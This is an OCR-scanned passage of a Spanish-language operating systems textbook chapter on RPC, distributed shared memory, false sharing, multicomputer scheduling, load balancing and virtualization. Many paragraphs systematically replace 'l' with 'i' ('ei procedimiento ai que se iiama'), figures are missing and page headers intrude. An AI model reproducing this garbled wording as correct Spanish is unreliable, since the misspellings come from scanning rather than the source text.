La idea detrás de RPC es hacer que una llamada a un procedimiento remoto sea lo más parecida 
a una llamada local. En su forma más simple, para llamar a un procedimiento remoto, el programa 
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cliente se debe enlazar con un pequeño procedimiento de biblioteca conocido como resguardo (stub) 
del cliente, el cual representa al procedimiento del servidor en el espacio de direcciones del cliente. 
De manera similar, el servidor se enlaza con un procedimiento conocido como resguardo del servi¬ 
dor. Estos procedimientos ocultan el hecho de que la llamada al procedimiento desde el cliente al 
servidor no es local. 

En la figura 8-20 se muestran los pasos para llevar a cabo una RPC. El paso 1 es cuando el 
cliente llama al resguardo del cliente. Esta llamada es una llamada a un procedimiento local, don¬ 
de los parámetros se meten en la pila de la manera usual. El paso 2 es cuando el resguardo del clien¬ 
te empaqueta los parámetros en un mensaje y realiza una llamada al sistema para enviarlo. Al 
proceso de empaquetar los parámetros se le conoce como marshaling. El paso 3 es cuando el ker- 
nel envía el mensaje de la máquina cliente a la máquina servidor. El paso 4 es cuando el kernel pa¬ 
sa el paquete entrante al resguardo del servidor (que por lo general llama a receive desde antes). Por 
último, el paso 5 es cuando el resguardo del servidor llama al procedimiento del servidor. La res¬ 
puesta sigue la misma ruta en dirección opuesta. 


CPU cliente CPU servidor 



Figura 8-20. Pasos para realizar una llamada a un procedimiento remoto. Los resguar¬ 
dos están sombreados en color gris. 

El elemento clave aquí es que el procedimiento cliente (escrito por el usuario) sólo hace una 
llamada a procedimiento normal (es decir, local) al resguardo del cliente, que tiene el mismo nom¬ 
bre que el procedimiento del servidor. Como el procedimiento del cliente y el resguardo del clien¬ 
te están en el mismo espacio de direcciones, los parámetros se pasan de la manera usual. De manera 
similar, un procedimiento llama al procedimiento del servidor en su espacio de direcciones, con los 
parámetros que espera. Para el procedimiento del servidor no hay nada fuera de lo común. De esta 
forma, en vez de realizar operaciones de E/S mediante send y receive, se lleva a cabo la comunica¬ 
ción remota al fingir una llamada a un procedimiento normal. 


Aspectos de implementación 

A pesar de la elegancia conceptual de la RPC, hay unos cuantos problemas a tratar. Uno de los más 
importantes es el uso de parámetros tipo apuntador. Por lo general no hay problema al pasar un 
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apuntador a un procedimiento. Ei procedimiento ai que se iiama puede utiiizar ei apuntador de ia 
misma forma que io hace ei procedimiento que hace ia iiamada, debido a que ios dos procedimien¬ 
tos residen en ei mismo espacio de direcciones virtuaies. Con ia RPC es imposibie pasar apuntado¬ 
res, ya que ei ciientey ei servidor se encuentran en distintos espacios de direcciones. 

En aigunos casos es posibie empiear trucos para que sea posibie pasar apuntadores. Suponga 
que ei primer parámetro es un apuntador a un entero k. Ei resguardo dei ciiente puede empaquetar 
a k y enviado hacia ei servidor. Después, ei resguardo dei servidor crea un apuntador a k y io pasa 
ai procedimiento dei servidor, como es de esperarse. Cuando ei procedimiento dei servidor devuei- 
veei controi ai resguardo dei servidor, éste envía a k de vueita ai ciiente, en donde ei nuevo k se co¬ 
pia sobre ei anterior, sóio en caso de que ei servidor io haya cambiado. En efecto, ia secuencia de 
iiamada estándar de ia iiamada por referencia se ha sustituido por copia-restauración. Por desgra¬ 
cia, este truco no siempre funciona: por ejempio, si ei apuntador apunta a un grafo u otra estructu¬ 
ra de datos compieja. Por esta razón, hay que imponer aigunas restricciones sobre ios parámetros 
para ios procedimientos a ios que se iiama de manera remota. 

Un segundo probiema es que en ios i enguajes con tipificación débii como C, es perfectamente 
váiido escribir un procedimiento que caicuie ei producto interno de dos vectores (arregios) sin es¬ 
pecificar ia iongitud de ninguno. Cada vector podría terminar por un vaior especiai conocido sóio 
para ei procedimiento que hizo ia iiamada y ei procedimiento ai que iiamó. Bajo esas circunstan¬ 
cias, en esencia es imposibie que ei taión dei ciiente pueda empaquetar ios parámetros, ya que no 
tiene manera de determinar qué tan grandes son. 

Un tercer probiema es que no siempre es posibie deducir ios tipos de ios parámetros, ni si¬ 
quiera a partir de una especificación formai o dei mismo código. La función printf es un ejempio, 
ya que puede tener cuaiquier número de parámetros (por io menos uno) y pueden ser una mezcia 
arbitraria de enteros, enteros cortos, enteros iargos, caracteres, cadenas, números de punto fiotan- 
te de varias iongitudes y otros tipos. Prácticamente sería imposibie tratar de iiamar a printf como 
un procedimiento remoto, ya que C no es tan permisivo. Sin embargo, una regia que diga que se 
puede utiiizar RPC siemprey cuando ei ienguaje de programación no sea C (o C- 1 -- 1 -) no sería tan 
popuiar. 

U n cuarto probiema se reiaciona con ei uso de ias variabies giobaies. Por io generai, ios proce¬ 
dimientos que hacen ias iiamadas y aquéiios a ios que se iiama se pueden comunicar mediante ei 
uso de variabies giobaies, además de hacerio mediante parámetros. Si ei procedimiento ai que se 
iiama se cambia a una máquina remota, ei código faiiará debido a que ias variabies giobaies ya no 
están compartidas. 

Estos probiemas no indican que RPC no tenga remedio. De hecho se utiiiza ampiiamente, pe¬ 
ro hay que tener cuidado y considerar ciertas restricciones para que funcione bien en ia práctica. 

8.2.5 M emoria compartida distribuida 

Aunque RPC tiene sus atractivos, muchos programadores aún prefieren un modeio de memoria 
compartida y Íes gustaría utiiizario también en una muiticomputadora. Para nuestra sorpresa, es po¬ 
sibie preservar muy bien ia iiusión de ia memoria compartida (aun cuando en reaiidad no existe) 
mediante ei uso de una técnica iiamada DSM (Distributed Shared M emory, M emoria compartida 
distribuida) (Li, 1986; Li y Hudak, 1989). Con ia DSM, cada página se iocaiiza en una de ias 
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memorias de la figura 8-1. Cada máquina tiene su propia memoria virtual y sus propias tablas de pá¬ 
ginas. Cuando una CPU realiza una operación load o store en una página que no tiene, se produce 
una interrupción que pasa al sistema operativo. Después, el sistema operativo localiza la página y pi¬ 
de a la CPU que la contiene que la desasigne y la envíe a través de la red de interconexión. Al lle¬ 
gar, la página se asigna y se reinicia la instrucción que fracasó. En efecto, el sistema operativo sólo 
está dando servicio a los fallos de página desde la RAM remota, en vez de hacerlo desde el dis¬ 
co local. Para el usuario, parece como si la máquina tuviera memoria compartida. 

En la figura 8-21 se ilustra la diferencia entre la verdadera memoria compartida y DSM . En la 
figura 8-21(a) podemos ver un verdadero multiprocesador, en el cual la memoria compartida física 
se implementa mediante el hardware. En la figura 821(b) podemos ver la DSM implementada por 
el sistema operativo. En la figura 8-21(c) podemos ver otra forma de memoria compartida, que se 
implementa mediante niveles más altos de software. M ás adelante en este capítulo regresaremos a 
esta tercera opción, pero por ahora nos concentraremos en la DSM . 
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Figura 8-21. Varios niveles en donde se puede implementar la memoria compartida, 
(a) El hardware, (b) El sistema operativo, (c) Software a nivel de usuario. 


Ahora veamos con cierto detalle la forma en que funciona la DSM . En un sistema de DSM el 
espacio de direcciones se divide en páginas, las cuales se esparcen por todos los nodos en el siste¬ 
ma. Cuando una CPU hace referencia a una dirección que no es local se produce una trampa, el soft¬ 
ware de DSM obtiene la página que contiene la dirección y reinicia la instrucción fallida, que ahora 
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se completa con éxito. Este concepto se ilustra en la figura 8-22(a) para un espacio de direcciones 
con 16 páginas y cuatro nodos, cada uno de los cuales es capaz de contener seis páginas. 


Memoria virtual compartida en forma global, que consiste de 16 páginas 



- Memoria 


(a) 


Red 



(b) 



(c) 


Figura 8-22. (a) Páginas del espacio de direcciones distribuidas entre cuatro máqui¬ 
nas. (b) La situación después de que la CPU 1 hace referencia a la página 10 y ésta se 
mueve ahí. (c) La situación que ocurre si sólo se lee la página 10 y se utiliza la dupli¬ 
cación. 


En este ejemplo, si la CPU 0 hace referencia a instrucciones o datos en las páginas 0, 2, 5 o 9, 
las referencias se resuelven en forma local. Las referencias a otras páginas producen trampas. Por 
ejemplo, una referencia a una dirección en la página 10 producirá una trampa al software de DSM, 
que entonces moverá la página 10 del nodo 1 al nodo 0, como se muestra en la figura 8-22(b). 
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Duplicación 

Una mejora al sistema básico que puede mejorar ei rendimiento en forma considerabie es ia dupii- 
cación de páginas que sean desóio iectura; porejempio: texto dei programa, constantes desdi o iec- 
tura u otras estructuras de datos de sóio iectura. Por ejempio, si ia página 10 en ia figura 8-22 es 
una sección de texto dei programa, cuando ia CPU 0 ia utiiice existe ia probabiiidad de que se en¬ 
víe una copia a ia CPU 0 sin perturbar ei texto originai en ia memoria de ia CPU 1, como se mues¬ 
tra en ia figura 8-22(c). De esta forma, iasCPUs 0 y 1 pueden hacer referencia a ia página 10 todas 
ias veces que io requieran, sin producir trampas para obtener ia memoria faitante. 

Otra posibiiidad es dupiicar no sóio ias páginas de sóio iectura, sino también todas ias páginas. 
M ientras se estén reaiizando iecturas, en reaiidad no hay ninguna diferencia entre dupiicar una pá¬ 
gina de sóio iectura y dupiicar una página de iectura-escritura. Pero si se modifica en forma repen¬ 
tina una página dupiicada, hay que reaiizar cierta acción especiai para evitar tener varias copias 
inconsistentes. En ias siguientes secciones veremos cómo evitar ia inconsistencia. 


Compartición falsa 

Los sistemas de DSM son simiiares a ios mu i ti procesadores en ciertos puntos ciave. En ambos sis¬ 
temas, cuando se hace referencia a una paiabra de memoria que no sea iocai, se obtiene un trozo de 
memoria que contiene ia paiabra de su ubicación actuai y se coioca en ia máquina que está hacien¬ 
do ia referencia (memoria principai o caché, respectivamente). Una cuestión importante de diseño 
es qué tan grande debe ser ei tamaño dei trozo. En ios muitiprocesadores, ei tamaño dei bioque de 
caché es por io generai de 32 o 64 bytes, para evitar ocupar demasiado tiempo ei bus con ia trans¬ 
ferencia. En ios sistemas de DSM , ia unidad tiene que ser un múitipiodei tamaño de ia página (de¬ 
bido a que ia M M U funciona con páginas), pero puede ser de 1, 2, 4 o más páginas. En efecto, ai 
hacer esto se simuia un tamaño de página mayor. 

Hay ventajas y desventajas en cuanto a un tamaño de página más grande para ia DSM . La ma¬ 
yor ventaja es que, como ei tiempo de inicio para una transferencia de red es bastante sustanciai, en 
reaiidad no se requiere mucho más tiempo para transferir 4096 bytes que para transferir 1024 by¬ 
tes. Ai transferir datos en unidades grandes, cuando hay que mover una pieza grande dei espacio de 
direcciones, a menudo se puede reducir ei número de transferencias. Esta propiedad es en especiai 
importante debido a que muchos programas exhiben una iocaiidad de referencia, io cuai significa 
que si un programa ha hecho referencia a una paiabra en una página, es probabie que haga referen¬ 
cia a otras paiabras en ia misma página en ei futuro inmediato. 

Por otra parte, ia red estará ocupada más tiempo con una transferencia más grande, y bioquea- 
rá ias otras faiias provocadas por ios otros procesos. Además, con un tamaño efectivo de página de¬ 
masiado grande se presenta un nuevo probiema, conocido como compartición falsa, ei cuai se 
iiustra en ia figura 8-23. Aquí tenemos una página que contiene dos vari abies compartidas que no 
están reiacionadas (A y B). Ei procesador 1 utiiiza de manera intensiva ia variabie A en operaciones 
de iectura y escritura. De manera simiiar, ei proceso 2 utiiiza ia variabie B con frecuencia. Bajo es¬ 
tas circunstancias, ia página que contiene ambas vari abies estará viajando constantemente entre una 
máquina y otra. 


564 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


CPU 1 CPU 2 



Figura 8-23. Compartición faisa de una página que contiene dos variabies no reiacio- 
nadas. 


El problema aquí es que, aunque las variables no están relacionadas, aparecen por casualidad 
en la misma página, por lo que cuando un proceso utiliza una de ellas, también obtiene la otra. La 
compartición falsa ocurrirá con más frecuencia entre mayor sea el tamaño efectivo de la página, y 
por el contrario, ocurrirá con menos frecuencia entre menor sea éste. En los sistemas de memoria 
virtual ordinarios no hay nada que sea análogo a este fenómeno. 

Los compiladores inteligentes que comprenden el problema y colocan las vari ables en el espacio 
de direcciones según sea necesario pueden ayudar a reducir la compartición falsa y a mejorar el ren¬ 
dimiento. Sin embargo, decirlo es más fácil que hacerlo. Lo que es más, si la compartición falsa con¬ 
siste en que el nodo 1 utilice un elemento de un arreglo y el nodo 2 utilice un elemento distinto del 
mismo arreglo, ni siquiera un compilador inteligente podrá hacer mucho por eliminar el problema. 

Cómo lograr una consistencia secuencial 

Si no se duplican las páginas en las que se pueden escribir datos, no hay problema para lograr la 
consistencia. Sólo hay una copia de cada página en la que se puede escribir, y ésta se puede trasla¬ 
dar de manera dinámica, según sea necesario. Como no siempre es posible ver por adelantado cuá¬ 
les son las páginas en las que se puede escribir, en muchos sistemas DM S cuando un proceso trata 
de leer una página remota, se crea una copia local y tanto ésta como la copia remota se establecen 
en sus M M Us respectivas como de sólo lectura. M i entras que todas las referencias sean lecturas, to¬ 
do está bien. 

No obstante, si cualquier proceso intenta escribir en una página duplicada, surge un problema 
de consistencia potencial debido a que no es aceptable modificar una copia y dejar las demás sin 
modificar. Esta situación es similar a lo que ocurre en un multiprocesador, cuando una CPU trata 
de modificar una palabra que está presente en varias cachés. La solución en este caso es que la CPU 
que está a punto de realizar la escritura coloque primero una señal en el bus, para indicar a todas las 
demás CPU s que deben descartar su copia del bloque de caché. Por lo general, los sistemas de DM S 
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funcionan de la misma forma. Antes de poder escribir en una página compartida, se envía un men¬ 
saje a todas las demás CPUs que contienen una copia de la página para indicarles que deben desa- 
signary descartarla página. Una vez que todas estas CPUs hayan respondido que han terminado de 
realizar la desasignación, la CPU original puede proceder con la escritura. 

También es posible tolerar varias copias de páginas en las que se pueda escribir, bajo circuns¬ 
tancias cuidadosamente restringidas. Una forma es permitir que un proceso adquiera un bloqueo so¬ 
bre una porción del espacio de direcciones virtuales, y que después realice varias operaciones de 
lectura y escritura en la memoria bloqueada. AI momento en que se libere el bloqueo se podrán pro¬ 
pagar los cambios a las demás copias. M ientras que sólo haya una CPU que pueda bloquear una pá¬ 
gina en un momento dado, este esquema podrá preservar la consistencia. 

De manera alternativa, cuando se escribe por primera vez en una página en la que se pueden lle¬ 
gar a escribir datos, se realiza una copia limpia y se guarda en la CPU que está realizando la escritu¬ 
ra. Así se pueden adquirir los bloqueos en la página, se actualiza ésta y se liberan los bloqueos. M ás 
adelante, cuando un proceso en una máquina remota trate de adquirir un bloqueo en la página, la CPU 
que escribió en ella antes compara el estado actual de la página con la copia limpia y crea un mensa¬ 
je con una lista de todas las palabras que se han modificado. Después, esta lista se envía a la CPU que 
adquirió el bloqueo para que actual i ce su copia en vez deinvalidarla (K el eher y colaboradores, 1994). 

8.2.6 Planificación de multicomputadoras 

En un multiprocesador, todos los procesos residen en la misma memoria. Cuando una CPU termi¬ 
na su tarea actual, selecciona un proceso y lo ejecuta. En un principio, todos los procesos son can¬ 
didatos potenciales. En una multicomputadora, esta situación es bastante distinta. Cada nodo tiene 
su propia memoria y su propio conjunto de procesos. La CPU 1 no puede decidir de manera repen¬ 
tina ejecutar un proceso localizado en el nodo 4, sin primero realizar una cantidad considerable de 
trabajo para obtenerlo. Esta diferencia significa que es más fácil la planificación en las multicompu¬ 
tadoras, pero es más importante la asignación de los procesos a los nodos. A continuación estudia¬ 
remos estas cuestiones. 

La planificación de multicomputadoras es un proceso similar a la planificación de multi proce¬ 
sadores, pero no todos los algoritmos de la primera se aplican a la segunda. Sin embargo, el algo¬ 
ritmo de multi procesador más simple (mantener una sola lista central de procesos listos) no 
funciona debido a que cada proceso sólo se puede ejecutar en la CPU en la que se encuentra ubica¬ 
do. Sin embargo, al crear un nuevo proceso podemos elegir en dónde colocarlo, por ejemplo para 
balancear la carga. 

Como cada nodo tiene sus propios procesos, se puede utilizar cualquier algoritmo de planifica¬ 
ción local. No obstante, también es posible utilizar la planificación de pandilla de los multi proce¬ 
sadores, ya que tan sólo requiere un acuerdo inicial sobre qué proceso se debe ejecutar en qué ranura 
de tiempo, y alguna forma de coordinar el inicio de las ranuras de tiempo. 

8.2.7 Balanceo de carga 

En realidad hay muy poco qué decir sobre la planificación de multicomputadoras, ya que una vez 
que se asigna un proceso a un nodo se puede utilizar cualquier algoritmo de planificación local, a 
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menos que se esté utilizando la planificación de pandilla. Sin embargo, y precisamente porque hay 
muy poco control una vez que se asigna un proceso a un nodo, es importante saber decidir en qué 
nodo debe ir cada proceso. Esto es lo contrario a los sistemas de mui ti procesadores, en donde todos 
los proceso viven en la misma memoria y se pueden programaren cualquier CPU que se desee. En 
consecuencia, es conveniente analizar la forma en que se pueden asignar los procesos a los nodos 
de una manera efectiva. Los algoritmos y la heurística para realizar esta asignación se conocen co¬ 
mo algoritmos de asignación de procesador. 

A través de los años se han propuesto muchos algoritmos de asignación de procesador (es decir, 
nodo). Estos algoritmos difieren en cuanto a lo que se supone que saben y cuál es el objetivo. L as pro¬ 
piedades que podrían conocerse sobre un proceso incluyen los requerimientos de la CPU, el uso de la 
memoria y cuánta comunicación con todos los demás procesos. Los posibles objetivos incluyen: mi¬ 
nimizar los ciclos desperdiciados de la CPU debido a que no hay trabajo local, minimizar el ancho de 
banda de comunicación total y asegurar que haya una equidad para los usuarios y los procesos. A con¬ 
tinuación examinaremos algunos algoritmos para tener una idea sobre lo que se puede hacer. 

Algoritmo determinístico basado en teoría de grafbs 

Hay una clase de algoritmos que se estudia mucho para los sistemas que consisten en procesos con 
requerimientos de CPU y memoria conocidos, y una matriz conocida que proporciona la cantidad 
promedio de tráfico entre cada par de procesos. Si el número de procesos es mayor que el número 
deCPUs (k), habrá que asignar varios procesos a cada CPU. La idea es realizar esta asignación pa¬ 
ra minimizar el tráfico de red. 

El sistema se puede representar como un grafo ponderado donde cada vértice es un proceso y 
cada arco representa el flujo de mensajes entre dos procesos. En sentido matemático, el problema 
se reduce a buscar una forma de partí clonar (es decir, recortar) el grafo en k subgrafos separados, 
sujetos a ciertas restricciones (por ejemplo, los requerimientos totales de CPU y memoria por de¬ 
bajo de ciertos límites para cada subgrafo). Para cada solución que cumpla con las restricciones, los 
arcos que se encuentran por completo dentro de un solo subgrafo representan la comunicación en¬ 
tre máquinas, y se pueden ignorar. Los arcos que van de un subgrafo a otro representan el tráfico 
de la red. El objetivo entonces es encontrar el particionamiento que minimice el tráfico de red, al 
tiempo que cumpla con todas las restricciones. Como ejemplo, en la figura 8-24 se muestra un sis¬ 
tema de nueve procesos (A a I), en donde cada arco está etiquetado con la carga de comunicación 
media entre los dos procesos correspondientes (por ejemplo, en M bps). 

En la figura 8-24(a) hemos particionado el grafo con los procesos A, E y G en el nodo 1, los 
procesos B, F y H en el nodo 2 y los procesos C, D e I en el nodo 3. El tráfico total de la red es la 
suma de los arcos intersecados por los cortes (las líneas punteadas), o 30 unidades. En la figura 
8-24(b) tenemos un particionamiento distinto, que sólo tiene 28 unidades de tráfico de red. Supo¬ 
niendo que cumpla con todas las restricciones de memoria y de CPU, ésta es una mejor opción de¬ 
bido a que requiere menos comunicación. 

Por intuición, lo que estamos haciendo es buscar clústeres que tengan un acoplamiento fuerte 
(flujo alto de tráfico entre clústeres), pero que interactúen poco con otros clústeres (flujo bajo de 
tráfico entre clústeres). Algunos de los primeros artículos que analizan este problema son (Chow y 
Abraham, 1982; Lo, 1984; Stoney Bokhari, 1978). 
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Figura 8-24. Dos formas de asignar procesos a tres nodos. 


Un algoritmo heurístico iniciado por el emisor 

A hora veamos algunos algoritmos distribuidos. U n algoritmo dice que cuando se crea un proceso, 
se ejecuta en el nodo que lo creó a menos que ese nodo esté sobrecargado. La métrica para sobre¬ 
carga podría implicar demasiados procesos, un conjunto de trabajo total muy grande o alguna otra 
métrica. Si el nodo está sobrecargado, selecciona otro nodo al azar y le pregunta sobre su carga 
(usando la misma métrica). Si la carga de ese nodo es menor a cierto valor de umbral, el nuevo pro¬ 
ceso se envía a ese nodo (Eager y colaboradores, 1986). Si no es menor, se selecciona otra máqui¬ 
na para el sondeo. Este proceso desondeo no es indefinido. Si no se encuentra un host adecuado en 
N sondeos o menos, el algoritmo termina y el proceso se ejecuta en la máquina que lo originó. La 
idea es que los nodos con mucha carga traten de deshacerse del exceso de trabajo, como se mues¬ 
tra en la figura 8-25(a), que ilustra el balanceo de carga iniciado por el emisor. 



Figura 8-25. (a) U n nodo sobrecargado busca a un nodo con poca carga para darie ai- 
gunos procesos, (b) U n nodo vacío busca aigo que hacer. 



























568 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


Eager y sus colaboradores (1986) construyeron un modelo de puesta en cola analítico de este 
algoritmo. M ediante el uso de este modelo se estableció que el algoritmo tiene un buen comporta¬ 
miento y es estable bajo un amplio rango de parámetros, incluyendo diversos valores de umbral, 
costos de transferencia y límites de sondeo. 

Sin embargo, hay que tener en cuenta que bajo condiciones de mucha carga, todas las máqui¬ 
nas enviarán sondas constantemente a otras máquinas, en un intento inútil por encontrar una que es¬ 
té dispuesta a aceptar más trabajo. Se descargarán pocos procesos hacia la otra máquina, además de 
que se puede producir una considerable sobrecarga al tratar de hacerlo. 

Un algoritmo heurístico distribuido, iniciado por el receptor 

Hay un algoritmo complementario para el que analizamos en la sección anterior (que lo inicia 
un emisor sobrecargado), el cual lo inicia un receptor con poca carga, como se muestra en la figu¬ 
ra 8-25(b). Con este algoritmo, cada vez que un proceso termina, el sistema comprueba si tiene su¬ 
ficiente trabajo. De no ser así, selecciona una máquina al azar y le pide trabajo. Si esa máquina no 
tiene nada que ofrecer, selecciona una segunda máquina y después una tercera. Si no se encuentra 
trabajo después de N sondeos, el nodo deja de pedir trabajo temporalmente, realiza cualquier traba¬ 
jo que se haya puesto en cola e intenta de nuevo cuando termina el siguiente proceso. Si no hay 
trabajo disponible, la máquina queda inactiva. Después de cierto intervalo fijo, empieza a sondear de 
nuevo. 

Una ventaja de este algoritmo es que no impone una carga adicional sobre el sistema en mo¬ 
mentos críticos. El algoritmo iniciado por el emisor realiza muchos sondeos precisamente cuando 
el sistema tiene menos capacidad de tolerarlos: cuando tiene mucha carga. Con el algoritmo inicia¬ 
do por el receptor, cuando el sistema tiene mucha carga hay muy poca probabilidad de que una má¬ 
quina no tenga suficiente trabajo. Sin embargo, cuando ocurra esto será fácil encontrar trabajo por 
hacer. Desde luego que cuando hay poco trabajo por hacer, el algoritmo iniciado por el receptor crea 
un tráfico de sondeo considerable, ya que todas las máquinas desempleadas están buscando traba¬ 
jo con desesperación. No obstante, es mucho mejor que aumente la sobrecarga cuando el sistema 
tiene poca carga que cuando está sobrecargado. 

También es posible combinar ambos algoritmos, para que las máquinas traten de deshacerse de 
trabajo cuando tengan mucho, y traten de adquirir trabajo cuando no tengan suficiente. Además, las 
máquinas tal vez puedan mejorar el sondeo al azar si mantienen un historial de sondeos anteriores, 
para determinar si tienen un problema crónico de poca carga o de mucha carga. Se puede probar 
uno de estos algoritmos primero, dependiendo de si el iniciador está tratando de deshacerse de tra¬ 
bajo, o de adquirir más. 


8.3 VIRTUALIZACIÓN 

En ciertas situaciones, una empresa tiene una multicomputadora pero en realidad no la quiere. Un 
ejemplo común es cuando una empresa tiene un servidor de correo electrónico, un servidor Web, un 
servidor FTP, algunos servidores de comercio electrónico, y otros servidores más. Todos estos ser¬ 
vidores se ejecutan en distintas computadoras del mismo bastidor de equipos, y todos están conec- 
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tados por una red de alta velocidad: en otras palabras, es una multicomputadora. En algunos casos, 
todos estos servidores se ejecutan en máquinas separadas debido a que una sola máquina no puede 
manejar la carga, pero en muchos otros casos la razón principal para no ejecutar todos estos servi¬ 
cios como procesos en la misma máquina es la confiabilidad: la administración simplemente no 
confía en que el sistema operativo se ejecute las 24 horas del día, los 365 o 366 días del año sin fa¬ 
llas. Al colocar cada servicio en una computadora separada, si falla uno délos servidores por lo me¬ 
nos los demás no se verán afectados. Aunque de esta forma se logra la tolerancia a fallas, esta 
solución es costosa y difícil de administrar debido a que hay muchas máquinas involucradas. 

¿Qué se debe hacer? Se ha propuesto como solución la tecnología de las máquinas virtuales, 
que a menudo se conoce sólo como virtualización y tiene más de 40 años, como vimos en la 
sección 1.7.5. Esta tecnología permite que una sola computadora contenga varias máquinas virtua¬ 
les, cada una de las cuales puede llegar a ejecutar un sistema operativo distinto. La ventaja de este 
método es que una falla en una máquina virtual no ocasiona que las demás fallen de manera auto¬ 
mática. En un sistema virtualizado, se pueden ejecutar distintos servidores en diferentes máquinas 
virtuales, con lo cual se mantiene el modelo parcial de fallas que tiene una computadora, pero a un 
costo mucho menor y con una administración más sencilla. 

Claro que consolidar los servidores de esta forma es como poner todos los huevos en una ca¬ 
nasta. Si falla el servidor que ejecuta todas las máquinas virtuales, el resultado es aún más catastró¬ 
fico que cuando falla un solo servidor dedicado. Sin embargo, la razón por la que la virtualización 
puede funcionar es que la mayoría de las fallas en los servicios no se deben a un hardware defec¬ 
tuoso, sino al software presuntuoso, poco confiable y lleno de errores, en especial los sistemas ope¬ 
rativos. Con la tecnología de máquinas virtuales, el único software que se ejecuta en el modo del 
kernel es el hipervisor, el cual tiene 100 veces menos líneas de código que un sistema operativo 
completo, y por ende tiene 100 veces menos errores. 

La ejecución de software en las máquinas virtuales tiene otras ventajas además de un sólido ais¬ 
lamiento. U na de ellas es que al tener menos máquinas físicas hay un ahorro en hardware y electri¬ 
cidad, y se ocupa menos espacio en la oficina. Para una compañía comoAmazon, Yahoo, M icrosoft 
o Google, que puede tener cientos de miles de servidores que realizan una enorme variedad de 
tareas distintas, la reducción de las demandas físicas en sus centros de datos representa un enorme 
ahorro en los costos. Por lo general, en las empresas grandes los departamentos individuales o gru¬ 
pos piensan en una idea interesante y después van y compran un servidor para implementar!a. Si 
la idea tiene éxito y se requieren cientos o miles de servidores, se expande el centro de datos cor¬ 
porativo. A menudo es difícil mover el software a las máquinas existentes, debido a que cada apli¬ 
cación necesita con frecuencia una versión distinta del sistema operativo, sus propias bibliotecas, 
archivos de configuración y demás. Con las máquinas virtuales, cada aplicación puede tener su 
propio entorno. 

Otra ventaja de las máquinas virtuales es que es mucho más fácil usar puntos de comprobación 
y migrar datos entre una máquina virtual y otra (por ejemplo, para balancear la carga entrevarlos ser¬ 
vidores) que migrar procesos que se ejecutan en un sistema operativo normal. En este último caso, 
se mantiene una cantidad considerable de información crítica de estado sobre cada proceso en las ta¬ 
blas del sistema operativo, incluyendo la información relacionada con la apertura de archivos, las 
alarmas, los manejadoras de señales y demás. Al migrar una máquina virtual, todo lo que hay que 
mover es la imagen de memoria, ya que todas las tablas del sistema operativo se mueven también. 
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Otro uso para las máquinas virtuales es para ejecutar aplicaciones heredadas en los sistemas 
operativos (o en versiones de los sistemas operativos) que ya no tienen soporte o que no funcionan 
en el hardware actual. Estas aplicaciones heredadas se pueden ejecutar al mismo tiempo y en el mis¬ 
mo hardware que las aplicaciones actuales. De hecho, la habilidad de ejecutar al mismo tiempo apli¬ 
caciones que utilizan distintos sistemas operativos es un gran argumento a favor de las máquinas 
virtuales. 

El desarrollo de software es otro uso aún más importante de las máquinas virtuales. Un progra¬ 
mador que quiera asegurarse que su software funcione en Windows 98, Windows 2000, Windows 
X P, Windows Vista, varias versiones de Linux, FreeBSD, OpenBSD, NetBSD y M ac OS X ya no 
tiene que conseguir una docena de computadoras e instalar distintos sistemas operativos en todas 
ellas. Lo único que tiene que hacer es crear una docena de máquinas virtuales en una sola compu¬ 
tadora e instalar distintos sistemas operativos en cada máquina virtual. Desde luego que el progra¬ 
mador podría haber particionado el disco duro para instalar un sistema operativo distinto en cada 
partición, pero este método es más dificultoso. En primer lugar, las PCs estándar sólo soportan cua¬ 
tro particiones primarias de disco, sin importar qué tan grande sea. En segundo lugar, aunque se po¬ 
dría instalar un programa de multiarranque en el bloque de arranque, sería necesario reiniciar la 
computadora para trabajaren otro sistema operativo. Con las máquinas virtuales todos los sistemas 
operativos se pueden ejecutar al mismo tiempo, ya que en realidad sólo son procesos glorificados. 


8.3.1 Requerimientos para la virtualización 

Como vimos en el capítulo 1, hay dos métodos para la virtualización. En la figura l-29(a) se mues¬ 
tra un tipo de hipervisor, denominado hipervisor de tipo 1 (o monitor de máquina virtuai). En 

realidad es el sistema operativo, ya que es el único programa que se ejecuta en modo del kernel.Su 
trabajo es soportar varias copias del hardware actual, conocidas como máquinas virtuaies, de una 
manera similar a los procesos que soporta un sistema operativo normal. Por el contrario, un hiper¬ 
visor detipo 2 [que se muestra en la figura l-29(b)] es algo completamente distinto. Es sólo un pro¬ 
grama de usuario que se ejecuta (por decir) en Windows o Linux e "interpreta" el conjunto 
de instrucciones de la máquina, el cual también crea una máquina virtual. Pusimos "interpreta" en¬ 
tre comillas debido a que por lo general, los trozos de código se procesan de cierta forma para des¬ 
pués colocarlos en la caché y ejecutarlos directamente para mejorar el rendimiento, pero la 
interpretación completa funcionaría en principio, aunque con lentitud. El sistema operativo que se 
ejecuta encima del hipervisor en ambos casos se denomina sistema operativo invitado. En el caso 
de un hipervisor de tipo 2, el sistema operativo que se ejecuta en el hardware se denomina sistema 
operativo anfitrión. 

Es importante tener en cuenta que en ambos casos las máquinas virtuales deben actuar justo de 
igual forma que el hardware real. Específicamente, debe ser posible iniciarlas como máquinas rea¬ 
les e instalar cualquier sistema operativo en ellas, justo como lo que se puede hacer con el hardwa¬ 
re real. La tarea del hipervisor es brindar esta ilusión con eficiencia (sin ser un intérprete completo). 

La razón de que haya dos tipos de hipervisores se debe a ciertos defectos en la arquitectura del 
Intel 386 que se acarrearon servilmente a las nuevas CPUs durante 20 años, para mantener la com¬ 
patibilidad inversa. En síntesis, cada CPU con modo de kernel y modo de usuario tiene un conjun- 
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to de instrucciones que sóio se pueden ejecutar en modo de kernei, como ias instrucciones que rea- 
iizan operaciones de E/S, ias que modifican ias opciones de ia M M U, etcétera. Popek y Goidberg 
(1974) desarroiiaron un trabajo ciásico sobre virtuaiización, en ei cuai a estas instrucciones Íes iia- 
maron instrucciones sensibles. También hay un conjunto de instrucciones que producen una tram¬ 
pa (interrupción) si se ejecutan en modo de usuario. A estas instrucciones, Popek y Goidberg Íes 
iiamaron instrucciones privilegiadas. En su artícuio deciararon por primera vez que una máquina 
se puede virtuaiizar sóio si ias instrucciones sensibies son un subconjunto de ias instrucciones pri- 
viiegiadas. Para expiicario en un ienguajemássimpie, si usted trata de hacer aigo en modo de usua¬ 
rio que no deba hacer en este modo, ei hardware deberá producir una interrupción. A diferencia de 
ia IBM/370, que tenía esta propiedad, ei Intei 386 no ia tiene. Se ignoraban muchas instrucciones 
